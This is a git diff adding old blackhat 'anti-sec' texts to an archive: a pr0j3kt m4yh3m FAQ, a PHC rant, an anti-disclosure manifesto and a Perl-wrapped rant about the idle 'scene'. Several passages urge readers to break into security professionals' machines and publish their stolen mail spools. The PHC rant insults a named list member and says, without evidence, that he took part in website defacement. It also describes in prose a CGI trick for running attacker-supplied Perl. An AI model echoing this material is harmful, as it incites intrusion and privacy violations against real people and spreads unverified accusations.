@@ -0,0 +1,70 @@
+Ok, lately more and more people kept asking the same questions.. They forced me to write down this FAQ so, read it and then ask questions!
+
+1. What the fuck is pr0j3kt m4yh3m i been hearing about?
+
+Pr0j3kt m4yh3m is the movement started by a group of blackhats that decided
+they can't bare anymore with the FUD and lies spread by the whitehat
+community, with the greed that is definitory for IT security companies, with
+the leeching performed by these companies on hackers and so on. Pr0j3kt
+m4yh3m is carried on by multiple independant cells who accomplish project's
+missions. This movement is not about terrorism but more about retaliation
+and cyber guerilla warfare.
+
+
+2. Why do you hate whitehats? Just because they earn money?
+
+Heh, this one is a redundant question. It keeps repeating all the time. Now,
+once and for all, we don't hate the whitehats because they earn money but
+for the ways they earn those money. By lying, by spreading rumours, by
+leeching on the underground that formed them. Them and IT companies are also
+targeted because they lie clueless people regarding hackers. They make
+hackers look as some sort of cyber terrorist that all he does is creating
+panic amongst all sorts of internet habitants. They also say that hackers
+can break into *ANY* machine connected to the internet, this ofcourse
+creating panic and enlarging their market segment. They don't care about
+security, all they do care about is money. They are evil! They leech their
+employees, they leech the underground, they leech their clients. Figure out
+for yourself.
+
+
+3. Why are you guys against full disclosure?
+
+Disclosure is, never the less, a bad thing. Figure it out: how many
+classified informations from other domains are made public?! NONE, zero,
+nada, nothing! But still, they promote the full disclosure in computer
+security. Have you ever asked yourself why? It's not that they care for the
+regular company that can't afford to hire a decent administrator... They
+want publicity, they want media attention, all this resulting in material
+benefits: if an IT security company makes public a proof-of-concept code or
+an advisory, it performs two things. It gets fame for that (and ofcourse, a
+larger market segment) and thousands of kiddies all over the world eventually
+work out an exploit from the advisory. So, people would fear getting hacked
+so, they would become customers of that IT security company. Remember this:
+knowledge given is power lost. Why giving powerful weapons to the kids all
+over?
+
+
+4. Real blackhats stay in underground. Why did u come out front?
+
+As we stated in 1., we just can't stand anymore seeing what the whitehat
+community is doing. They almost killed the scene, breaking it in half.
+Whitehats all over the world are brainwashing thousands and thousands of
+people, making them share their mindset. As a result, people think that
+blackhat equals script kiddie and hacker equals IT security researcher. This
+is so wrong! Hackers hack! Most of whitehat knowledge originates from the
+underground. Most of the stuff they publish is heard by them from the few
+underground connections left. And yet, they try to kill this underground and
+they call it "script kiddies". ~el8/PHC/other groups will carry on this war
+forever, until something changes! More and more groups adhere to pr0j3kt
+m4yh3m.
+
+
+5. Is Pr0j3kt M4yh3m visible to us?
+
+Hell yeah! Even if nobody knows the other cells, even if nobody knows what
+others do, look around you: you see supposedly secured servers gettin
+hacked, you see security professionals hacked proving that they are giving a
+false sense of security. *EVERYTHING* aimed at harming security industry in
+one way or the other is an action of pr0j3kt m4yh3m. Pr0j3kt's cells are
+spread all over the world, one could even be in your neighbourhood so watch
+out!
diff --git a/anti-sec/txt/hack4.txt b/anti-sec/txt/hack4.txt
new file mode 100644
index 0000000..ac4adee
--- /dev/null
+++ b/anti-sec/txt/hack4.txt
@@ -0,0 +1,199 @@
+
+A PHC PRODUCTION: THE REAL SCRIPTKIDDIES
+
+[Posted to the netsys.com 'full-disclosure' list.]
+
+Does anyone find it strange that the talentless scriptkiddy Ron DuFresne is
+banging on about "kids this" and "kids that"? I certainly do. This clueless
+moron is in no position to speak down on or scold those he obviously knows
+nothing about.
+
+If you search google for his name, you can easily see the technically inept
+scriptkiddy Ron DuFresne making a monkey out of himself:
+
+http://www.google.com/search?q=%22Ron+DuFresne%22
+
+This guy knows nothing beyond 1980's security policy construction and
+point-and-click firewall operation. He makes many technical blunders in his
+posts and displays an uncanny knack for sounding like a total dumbass.
+
+For those out of the loop, the scriptkiddy Ron DuFresne was a former member
+of the defacement group known as GForce Pakistan, albeit only for a month or
+so at most. What's sad is that he has admitted this in the past, but
+justifies it as some kind of adventure "for research purposes." He also
+denies having defaced any websites. Still, makes you wonder, doesn't it?
+
+I also see many other technically incompetent people/leeches on this list
+who are making unqualified assertions that so-and-so are scriptkids, that
+so-and-so don't know their stuff, that so-and-so are attention deprived...
+
+If you can answer 'yes' to all of the questions below, then by all means
+feel free to think of yourself as equal to or better than these ~el8 guys.
+Otherwise, please stop speaking down to people who are obviously much more
+technically skilled than your ignorance will ever allow you to be.
+
+* Do you know how to program in C? Are you intimately familiar with ISO C89?
+C99? While other people in your neighbourhood were out partying, were you
+sitting at home in bed making an almost biblical study of the POSIX
+standards? What about those from The Open Group?
+
+* Do you know how to write hash tables? Balanced trees? Do you know the art
+of algorithms? Do you know Knuth's work like the back of your hand? Did you
+teach yourself everything about computers that one would otherwise only
+learn by paying thousands of dollars for in Computer Science tuition?
+
+* Do you know how to juggle assembly code in your head for multiple
+architectures, such as MIPS, SPARC, x86? Do you understand the peculiarities
+of each architecture down to the nittiest, grittiest details? Can you
+optimize your own assembly routines? Can you take advantage of things such
+as Pentium instruction pairing or the delay slots in various RISC
+architectures? Do you understand the deal with the I-Cache on MIPS? Are you
+fluent in assembly language? Hell, do you even know what SPARC stands for?
+Quadrants in PA-RISC, make sense?
+
+* Do you know how to write your own exploits? Do you know how to audit
+software with surgical precision for the most intricate bugs imaginable? Do
+you know how to take advantage of buffer overflows? Do you know how to
+exploit off-by-one errors on a little-endian machine? Do you know about
+integer overflows and signedness issues? Can you exploit format string
+vulnerabilities? Can you gain control of a process vulnerable to a heap
+overflow via a deep knowledge of the malloc implementation on the target
+host? Do you know how to bypass the "security" afforded by crap like
+Openwall, StackGuard, PaX? Or is your knowledge of these things limited to
+the papers that non-hackers publish? You probably think the people trying to
+help the security community with bullshit patches/fixes like this are
+hackers, when in fact no hacker would ever publish any such thing that aims
+to improve security.
+
+* Have you studied the UNIX kernel with as much fervour as some would have
+for physical pursuits such as basketball or baseball? Do you know the data
+structures and organization in the kernels of various operating systems?
+Have you read books on UNIX internals cover to cover? Do you know how Linux
+works under the hood? Can you write your own kernel modules for both defense
+and offense? Ever written a kld on FreeBSD? Can you write a device driver
+for a peripheral that your OS doesn't support? Can you find flaws in kernel
+src trees that allow you to compromise a machine given local access?
+
+* What do you know about evading (N)IDS? Your knowledge isn't limited to
+what Thomas Ptacek & Tim Newsham have said years ago, right? Surely you
+don't rely on tools written by people like Dug Song who like to think of
+themselves as hackers, when in fact they are traitors to the underground,
+assuming they were ever a part of it to begin with.
+
+* What do you know about defeating firewalls? What techniques have you
+innovated and pioneered on your own? What tools have you written that allow
+you to toy with firewalls? Hell, the fucktard security community is probably
+limited to lameass crap like Firewalk.
+
+* What do you know about web security? Do you sit back and laugh at the
+"cross-site scripting" revolution governed by an idea that has been around
+well before the CSS/XSS sensation that literally blew the dumbass security
+community apart? Must've wasted a lot of brain cells with that gigantic
+stretch of the imagination. Do you laugh at all these "SQL injection" papers
+and how most of them overlook the blatantly obvious: they have you believe
+you have to fumble around with all kinds of convoluted queries to achieve
+something that can be done with minimal typing if only they'd read the
+fucking documentation for various DBMS. Their CGI experts like RFP and
+Zenomorph call certain script conditions non-exploitable, e.g. when you
+can't get arguments supplied to a binary that you've managed to trick a Perl
+script into running -- RFP mentions this in his Phrack article -- yet any
+moron can easily figure out that you can use the POST method, make the
+script run /usr/bin/perl for instance, and have it run a script of your
+choice that is fed as stdin from the HTTP request's POST data. Oh God, sorry
+for pushing the realm of web security forward with this INCREDIBLY COMPLEX
+revelation.
+
+* Have you written your own tools that exploit protocol weaknesses? Have you
+written your own tools for routing protocol weaknesses, e.g. RIP, BGP? Have
+you written your own tools that play games with DNS? Have you written your
+own ARP cache poisoning / mitm tools? Your own tools for shit like icmp
+redirects and router advertisements? Can you write a tool that will exploit
+the TCP sequence number prediction + IP spoofing vulnerability of older
+days? Or can you only mock Mitnick for his 1994 attack, calling him a
+scriptkiddy? Or utter useless banter about ISNs and cookies that you
+digested from some textfile? Who are you kidding? Fuck, have you read all 3
+volumes of the glorious TCP/IP Illustrated, or can you just mumble some
+useless crap about a 3-way handshake? Do you know Net/3 code? TCP
+algorithms? TCP extensions? Perhaps you're some fucking security expert
+because you've memorized /etc/services -- a walking fucking getservbyport, a
+la 70% of the Vuln-Dev subscription base.
+
+.....................................
+
+I have seen the ~el8 guys cover the full spectrum of everything discussed
+above. 95% of the people calling them scriptkids probably can't even code
+helloworld.c.
+
+Further ranting for those who are so quick to judge...
+
+Are you just a fucking whitehat leech who knows nothing more than how to use
+tools written by others? Using techniques and exploits that most likely
+originated in the playground of blackhats known as the computer underground.
+More likely than not you're a fucking scriptkid who only knows how to do
+mundane and trivial crap like configuring ACLs on a Cisco router or some
+half-assed product such as Firewall-1.
+
+You likely are so ignorant that you believe anyone who compromises machines
+is a clueless scriptkiddy like yourself. You likely are so idiotic that you
+believe that Bugtraq and CERT will protect you from the latest 0day
+exploits.
+
+You think Apache 1.3.26 can't be compromised remotely with one of four two
+year old Apache remotes that haven't even been hinted at on the security
+lists. You think sendmail is (now) remotely secure because what you don't
+see on Bugtraq doesn't exist. Qmail. ProFTPd. My God, you people are so
+fucking out of it. People report intrusions on their machines and you
+dumbfucks immediately conclude it's done by some public vulnerability, e.g.
+OpenSSL. That's right, because in your ignorant bliss there are no skilled
+people out there who would actually use their exploits to hack.
+Narrow-minded fools. Scriptkiddies.
+
+You know nothing of what lurks beneath the surface glamour of the corrupt
+security industry/community. Your only resort is to call these people kids.
+
+Trust me, they laugh at you clueless imbeciles. They laugh at your feeble
+attempts to manipulate hacking so that it becomes some fucking ethical or
+philanthropic pursuit. They laugh at your "hacker vs. cracker" debates. They
+laugh at anyone who thinks hacking isn't about compromising computer
+systems.
+
+Who are the scriptkids now? You're outgunned and outclassed. Take a nap and
+retire, you pathetic leeches.
+
+The scriptkids like Ron DuFresne and Anodyne Perspective are likely going to
+snap after reading this, so I'm sitting back looking forward to the imminent
+outbursts from these scriptkids whose only rebuttals will be in the...
+
+"I have my fingers in my ears, can't hear you kids NANANANANAN JAJAJAJAJAJA
+itiththdsfhg grow up immature children, get a girlfriend HHSHee KkakakKAkka
+pffffttt damn kiddies."
+
+... range.
+
+All "dox" dropped on the lists have been fake. They have been engineered by
+people either making false assumptions or trying to get their "foes" in
+trouble. Most of the phony ~el8 members lists mention people that have been
+attacked by ~el8, ironically enough. Put one and one together. There is only
+valid "info" for one of those poor souls, anywayz.
+
+It's time for an underground revolution. You all quote The Mentor's
+Manifesto in your misguided ethics rants; alas, The Mentor was an active
+hacker, in the true, modern sense of the word. Stop being brainwashed ye
+hackers. Keep your souls untarnished.
+
+It's time to bring the corrupt security industry to its knees.
+
+THE SECURITY INDUSTRY DEMOLISHED OUR WORLD.
+
+THERE WILL NOW BE HELL TO PAY.
+
+
+                Offer up your best defense
+                But this is the end
+                This is the end of the innocence
+
+
+
+
+
+
diff --git a/anti-sec/txt/movement.txt b/anti-sec/txt/movement.txt
new file mode 100644
index 0000000..855c31c
--- /dev/null
+++ b/anti-sec/txt/movement.txt
@@ -0,0 +1,48 @@
+
+   The purpose of this movement is to encourage a new policy of anti-disclosure
+   among the computer and network security communities. The goal is not to
+   ultimately discourage the publication of all security-related news and
+   developments,  but  rather,  to  stop the disclosure of all unknown or
+   non-public exploits and vulnerabilities. In essence, this would put a stop
+   to the publication of all private materials that could allow script kiddies
+   from compromising systems via unknown methods.
+
+   The open-source movement has been an invaluable tool in the computer world,
+   and we are all indebted to it. Open-source is a wonderful concept which
+   should and will exist forever, as educational, scientific, and end-user
+   software should be free and available to everybody.
+
+   Exploits, on the other hand, do not fall into this broad category. Just like
+   munitions,  which  span  from cryptographic algorithms to hand guns to
+   missiles, and may not be spread without the control of export restrictions,
+   exploits should not be released to a mass public of millions of Internet
+   users. A digital holocaust occurs each time an exploit appears on Bugtraq,
+   and  kids  across  the  world download it and target unprepared system
+   administrators. Quite frankly, the integrity of systems world wide will be
+   ensured to a much greater extent when exploits are kept private, and not
+   published.
+
+   A common misconception is that if groups or individuals keep exploits and
+   security secrets to themselves, they will become the dominators of the
+   "illegal scene", as countless insecure systems will be solely at their
+   mercy. This is far from the truth. Forums for information trade, such as
+   Bugtraq, Packetstorm, www.hack.co.za, and vuln-dev have done much more to
+   harm the underground and net than they have done to help them.
+
+   What casual browsers of these sites and mailing lists fail to realize is
+   that  some  of the more prominent groups do not publish their findings
+   immediately, but only as a last resort in the case that their code is leaked
+   or has become obsolete. This is why production dates in header files often
+   precede release dates by a matter of months or even years.
+
+   Another false conclusion by the same manner is that if these groups haven't
+   released anything in a matter of months, it must be because they haven't
+   found anything new. The regular reader must be made aware of these things.
+
+   We are not trying to discourage exploit development or source auditing. We
+   are merely trying to stop the results of these efforts from seeing the
+   light.  Please  join  us  if  you  would  like  to  see  a stop to the
+   commercialization, media, and general abuse of infosec.
+
+   Thank you.
+
diff --git a/anti-sec/txt/scene_sub.txt b/anti-sec/txt/scene_sub.txt
new file mode 100644
index 0000000..d2ba588
--- /dev/null
+++ b/anti-sec/txt/scene_sub.txt
@@ -0,0 +1,54 @@
+sub Scene { ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; my $self = shift; own($self, <<'EOSCENE'
+
+"Times change and technology progresses. Attackers adept and attacks evolve.
+At this point in history, we can wax fondly for the halcyon days when computers
+were hacked for pride or ego -- the good ole' simpler times when underground
+hacker wars were electronically waged and the collateral damage was the main
+website of The New York Times. Or the Solaris machines that were owned and the 
+high profile computer security icons that had their e-mail spools stolen and 
+personal poetry publicly posted. Or the OpenBSD machines that were rumored
+to be silently owned and the early copies of the most lauded online underground
+hacker journal that were distributed months ahead of time. Good times. Nowadays,
+there is no underground hacker scene -- not like there used to be (bring back 
+BoW and Hagis!)." -- Mike Schiffman from the introduction to _Hacker's_Challenge_3_
+
+While route is indeed a whitehat sellout (and appears to like watching his
+co-workers be publicly humiliated), he is certainly correct about one thing:
+The Scene is IDLE. Not just a little idle, we're talking over a year of idleness
+here. Sure, occasionally groups attempt to make a stir. Undoubtedly, some of
+the readers will remember the PHC Delka Strike Force, hosted at http://el8.ru/x/
+ (now down). Or the release of the epic h0no3 about one year ago. And of course,
+our own fun little contributions. However, despite the hard work of a number of 
+individuals, many of the goals originally set forth for pr0j3kt m4yh3m by el8 and 
+the Phrack High Council have yet to be accomplished. This needs to change. 
+Instead of chatting on IRC all day, go out and own a whitehat. Do a PHC mission. 
+Contribute to pr0j3kt m4yh3m. 
+
+The recent events revolving around the blogger known as "InfoSec Sellout" 
+bring an interesting point to light. When the older "security professionals" 
+discovered the "fact" that InfoSec Sellout was LMH and was backed by PHC, it
+caused quite a stir for those that remembered the heyday of the pr0j3kt. For 
+the whitehats that had just entered the industry post-whitehat holocaust, it 
+didn't mean a thing. They simply assumed (like 90% of the HTS userbase) that 
+PHC was/is a group of dissatisfied script kiddies. Too bad all the evidence
+points to the contrary. Another sad fact is that whitehats have not only
+taken over the public side of the scene, but the private side as well. These
+"revelations" about InfoSec Sellout at one time would have come from an
+anonymous post to FD, from a member of the underground. Now they come from a
+"respected security professional". Instead of talking about the activities of
+real hackers, the gossip reels these days deal with the exploits of whitehats
+like David Maynor, HD Moore and others. Is this what we've allowed the scene to
+become? A bunch of idlers thinking about fat middle aged whitehats? Where's the 
+rage? Where's the dedication to the eradication of the greedy security 
+consultants? Where's all the activity that was prevalent in the scene until 
+recently?
+
+A time has come for a change. Follow the example dikline set out. Take back the
+scene! Go out and actually hack. Don't post exploits to FD; post a whitehat's
+spools! Continue the legacy of the glorious pr0j3kt m4yh3m!
+
+Never sell out, never surrender.
+
+EOSCENE
+);}
+